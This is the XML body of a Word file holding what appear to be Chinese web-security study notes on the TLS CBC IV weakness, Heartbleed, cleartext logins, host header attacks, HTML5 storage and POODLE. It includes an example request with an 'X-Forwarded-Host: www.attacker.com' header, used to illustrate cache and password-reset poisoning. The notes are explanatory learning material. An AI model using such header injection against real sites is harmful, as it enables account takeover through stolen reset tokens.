    </w:p>
    <w:p w14:paraId="00131FF3" w14:textId="54D2B039" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在，除非</w:t>
      </w:r>
      <w:r>
        <w:t>C0 碰巧和IV一样（这是非常不可能的），那么，即使M0 = M1，对于加密函数来说，两个输入是不同的，因此，C0≠ C1。 CBC有两种的基本的使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624078C" w14:textId="33A45981" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t xml:space="preserve">   1. 对于每条记录都认为是独立的；为每一个记录产生一个IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0B274" w14:textId="6970DDE5" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   2. 把所有的记录当作一个链接在一起的大对象，并且在记录之间继续使用CBC的状态。这意味着最后一条记录n的IV是n-1条记录的密文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F78DCE5" w14:textId="29FD7E13" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>SSLV3和TLS1.0选择的是第二个用法。这好像本来就是个错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCF1DE" w14:textId="7CDA573F" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>CBC有两种的基本的使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C406D" w14:textId="5CF430A2" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t xml:space="preserve">   1. 对于每条记录都认为是独立的；为每一个记录产生一个IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA6389" w14:textId="115387FD" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t xml:space="preserve">   2. 把所有的记录当作一个链接在一起的大对象，并且在记录之间继续使用CBC的状态。这意味着最后一条记录n的IV是n-1条记录的密文。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC77F0" w14:textId="1F22DC8C" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>SSL 3.0和TLS1.0选择的是第二个用法。因此产生了加密算法的安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDDCFC" w14:textId="1773AFC4" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以把想要猜测的数据段替换掉成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60BDA2" w14:textId="4C2AC1ED" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>X ⊕ Ci-1 ⊕ P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05B661" w14:textId="1F5E8521" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当这个注入的内容被加密，</w:t>
      </w:r>
      <w:r>
        <w:t>X会被异或，结果传给加密算法的明文块如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF5A6C0" w14:textId="08260946" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>Ci-1 ⊕ P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709788E0" w14:textId="4C949C52" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>P==Mi ， 新的密文块将和Ci一样，这意味着，你的猜测是正确的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20467359" w14:textId="77777777" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186"/>
    <w:p w14:paraId="148C0AE1" w14:textId="7B97813C" w:rsidR="00FC7FDB" w:rsidRDefault="00614691" w:rsidP="00614691">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求明文传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F31753" w14:textId="7980CA81" w:rsidR="008A0F11" w:rsidRDefault="008A0F11" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文传输用户登录凭证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E141D10" w14:textId="5CE5A18F" w:rsidR="00FC7FDB" w:rsidRDefault="00614691" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4AC90E" wp14:editId="7B206541">
            <wp:extent cx="5274310" cy="1812925"/>
            <wp:effectExtent l="0" t="0" r="254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74310" cy="1812925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D5094" w14:textId="4B3AA8B5" w:rsidR="00FC7FDB" w:rsidRDefault="00614691" w:rsidP="00614691">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>心脏滴血漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1B761" w14:textId="5E29E5E9" w:rsidR="008A0F11" w:rsidRDefault="008A0F11" w:rsidP="008A0F11">
      <w:r>
        <w:t>OpenSSL在实现TLS和DTLS的心跳处理逻辑时，存在编码缺陷。OpenSSL的心跳处理逻辑没有检测心跳包中的长度字段是否和后续的数据字段相符合，攻击者可以利用这一点，构造异常的数据包，来获取心跳数据所在的内存区域的后续数据。这些数据中可能包含了证书私钥，用户名，用户密码，用户邮箱等敏感信息。该漏洞允许攻击者从内存中读取多达64KB的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542FA559" w14:textId="77777777" w:rsidR="008A0F11" w:rsidRDefault="008A0F11" w:rsidP="008A0F11">
      <w:r>
        <w:t>SSL(Secure Socket Layer 安全套接层)及其继任者传输层安全（Transport Layer Security，TLS）是为网络通信提供安全及数据完整性的一种安全协议。TLS和SSL在传输层对网络连接进行加密。所以通过SSL或TLS协议加密后的数据包再通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>软件进行对数据包的抓取时，抓取到的数据也是经过加密处理的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E71D5A" w14:textId="77777777" w:rsidR="008A0F11" w:rsidRDefault="008A0F11" w:rsidP="008A0F11">
      <w:r>
        <w:t>   DTLS(Datagram Transport Layer Security)数据包传输层安全协议。TLS不能用来保证UDP上传输的数据的安全，因此Datagram TLS试图在现存的TLS协议架构上提出扩展，使之支持UDP，即成为TLS的一个支持数据报传输的版本。DTLS1.0基于TLS1.1，DTLS1.2基于</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TLS1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DCD41" w14:textId="77777777" w:rsidR="008A0F11" w:rsidRDefault="008A0F11" w:rsidP="008A0F11">
      <w:r>
        <w:t>   心脏出血漏洞主要通过攻击者模拟向服务器端发送自己编写的Heartbeat心跳数据包，主要是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HeartbeatMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的长度与payload的length进行匹配，若</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload_lenght</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>长度大于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HeartbeatMes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sage的length，则会在服务器返回的response响应包中产生数据溢出，造成有用数据泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0A8BE" w14:textId="085EF287" w:rsidR="001C7B1B" w:rsidRDefault="008A0F11" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接:原文：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://blog.csdn.net/yaofeiNO1/article/details/54428021 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C2CF3" w14:textId="181A2900" w:rsidR="001C7B1B" w:rsidRDefault="001C7B1B" w:rsidP="001C7B1B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机头攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6CD97" w14:textId="77777777" w:rsidR="00685F03" w:rsidRDefault="00C508D1" w:rsidP="00685F03">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Web服务器在同一IP地址上托管多个网站或Web应用程序。这就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r>
        <w:t>头存在的原因</w:t>
      </w:r>
      <w:r w:rsidR="00685F03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。托管在同一</w:t>
      </w:r>
      <w:r w:rsidR="00685F03">
        <w:t>IP地址上的每个Web应用程序通常称为虚拟主机。什么构成主机头攻击</w:t>
      </w:r>
      <w:r w:rsidR="00685F03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B6365A" w14:textId="60C9F56B" w:rsidR="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F03">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以指定无效的主机标头，大多数</w:t>
      </w:r>
      <w:r>
        <w:t>Web服务器都配置为将无法识别的主机头传递给列表中的第一个虚拟主机。因此，可以将具有任意主机头的请求发送到第一个虚拟主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FFE93" w14:textId="435ACE52" w:rsidR="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F03">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4644"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递任意主机头的另一种方法是使用</w:t>
      </w:r>
      <w:r>
        <w:t>X-Forwarded-Host头。在某些配置中，此标头将重写Host标头的值。因此，可以提出以下请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341EFB4A" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B20FF" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host: www.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114DABAF" w14:textId="3ED8E25D" w:rsidR="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X-Forwarded-Host: www.attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170D11E" w14:textId="7302C339" w:rsidR="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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3128D004" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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22A04F08" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>许多</w:t>
      </w:r>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web应用程序依赖于HTTP 主机头来理解“它们在哪里”。不幸的是，许多应用程序开发人员没有意识到HTTP主机头是由用户控制的。您可能已经知道，在应用程序安全性中，用户输入应始终被视为不安全，因此，如果没有先验证它，就永远不会信任。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B04BC4C" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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7FB89A01" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主机头的使用在</w:t>
      </w:r>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP Web应用程序中尤为常见，但是，它肯定不是PHP Web应用程序特有的问题。以下示例中的PHP脚本是主机头的典型且危险的用法。就</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的这个例子而言</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5EBE4" w14:textId="774EBECF" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00ED3C0F" w:rsidP="00685F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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D111475" wp14:editId="62E14631">
            <wp:extent cx="5274310" cy="3286125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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74310" cy="3286125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3A566" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以看到当低级别的时候，</w:t>
      </w:r>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$server = $_SERVER["HTTP_HOST"]，这就很危险。主要的头部攻击启用的两个主要攻击媒介是网络缓存中毒，以及滥用其他渠道进行敏感操作，例如密码重置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD2952" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="003B5029" w:rsidRDefault="00685F03" w:rsidP="00685F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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5029">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络缓存中毒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058724E1" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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2C9E8968" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web缓存中毒是攻击者用来操纵Web缓存以向请求页面的任何人提供有毒内容的技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A2110" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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74A34B2F" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为此，攻击者需要毒害由站点本身或下游提供者，内容传递网络（</w:t>
      </w:r>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CDN），聚合器或客户端与服务器之间的其他缓存机制运行的缓存代理。然后，缓存将向被请求它的任何人提供有毒内容，受害者无法控制向他们提供的恶意内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37884B40" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="003B5029" w:rsidRDefault="00685F03" w:rsidP="00685F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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5029">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>密码重置中毒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BBB5CA" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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7639AA32" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现密码重置功能的常用方法是生成秘密令牌并发送包含此令牌的链接的电子邮件。如果攻击者通过攻击者控制的主机头请求密码重置，会发生什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4339A1" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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37068A77" w14:textId="77777777" w:rsidR="00685F03" w:rsidRPr="00685F03" w:rsidRDefault="00685F03" w:rsidP="00685F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85F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00685F03">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web应用程序在编写重置链接时使用主机头值，则攻击者可能会中毒发送给受害者的密码重置链接。如果受害者点击电子邮件中的中毒重置链接，攻击者将获得密码重置令牌并可以继续并重置受害者的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844EDC4" w14:textId="77777777" w:rsidR="00614691" w:rsidRDefault="001C6E51" w:rsidP="001C6E51">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">TML5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD910E0" w14:textId="608C03A7" w:rsidR="00614691" w:rsidRDefault="001C6E51" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7675006C" wp14:editId="49B24022">
            <wp:extent cx="5274310" cy="1873250"/>
            <wp:effectExtent l="0" t="0" r="254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74310" cy="1873250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76F3AC" w14:textId="6EA2ED82" w:rsidR="00614691" w:rsidRDefault="001C6E51" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>TML5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将敏感信息保存在本地</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFDDFC7" w14:textId="77777777" w:rsidR="004C517F" w:rsidRDefault="004C517F" w:rsidP="004C517F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>是HTML新增的本地存储解决方案之一，但并不是为了取代cookie而制定的标准，cookie作为HTTP协议的一部分用来处理客户端和服务器通信是不可或缺的，session正是依赖于实现的客户端状态保持。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的意图在于解决本来不应该cookie做，却不得不用cookie的本地存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E97C1" w14:textId="77777777" w:rsidR="004C517F" w:rsidRDefault="004C517F" w:rsidP="004C517F"/>
    <w:p w14:paraId="3E8D5A43" w14:textId="4B251AAF" w:rsidR="001C6E51" w:rsidRDefault="004C517F" w:rsidP="00FC7FDB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>提供两种类型的API：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，两者的区别看名字就有大概了解，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>在本地永久性存储数据，除非显式将其删除或清空，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>存储的数据只在会话期间有效，关闭浏览器则自动删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687B5EF" w14:textId="4F5B764D" w:rsidR="001C6E51" w:rsidRDefault="001C6E51" w:rsidP="00FC7FDB"/>
    <w:p w14:paraId="02D65825" w14:textId="41D9DC90" w:rsidR="001C6E51" w:rsidRDefault="001C6E51" w:rsidP="001C6E51">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OODLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CAA0C" w14:textId="7074CBBC" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:t>SSLv3降级加密协议Padding Oracle攻击（POODLE）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞概述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F646E57" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>SSL 3.0的历史非常久远，已经有将近15年了，现今几乎所有的浏览器都支持该协议。今天该协议爆出了一个漏洞，该漏洞由谷歌公司率先发现，下面是此漏洞的大致描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9F397" w14:textId="77777777" w:rsidR="004D7BE7" w:rsidRDefault="004D7BE7" w:rsidP="004D7BE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　攻击者可利用该漏洞获取安全连接当中某些是</w:t>
      </w:r>
      <w:r>
